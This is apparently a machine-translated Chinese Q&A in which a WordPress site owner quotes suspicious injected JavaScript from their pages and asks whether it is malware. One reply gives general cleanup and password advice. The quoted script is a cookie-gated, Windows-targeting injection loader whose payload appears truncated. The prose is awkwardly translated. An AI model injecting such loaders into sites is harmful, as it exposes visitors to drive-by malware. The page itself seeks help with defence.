这是什么？谷歌分析cookie或恶意软件？

Question

我有一个WordPress的安装，目标已经非常严重的网络钓鱼操作。我原本以为安全主要覆盖除了我看到这个标题：

var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};

该URL的到底是超级可疑。我一派但没有发现线索:-(

我还没有发现在我的WP安装代码的来源。它不被写入模板文件或数据库。在更新WP现在安装的过程。

有没有人有任何这知识呢？

Answer 1

这看起来很奇怪，我也许尝试重新安装WordPress和选择非常复杂的密码，因此没有人未经授权可以访问你的网站，你可能想从页面移除谷歌分析代码看看这是否有所不同复杂的密码包括数字，大写和小写字母，斜线和任何你能想到的东西确保它长于8个字母如果你的网站被感染，现在从网上取下，直到确定它不是。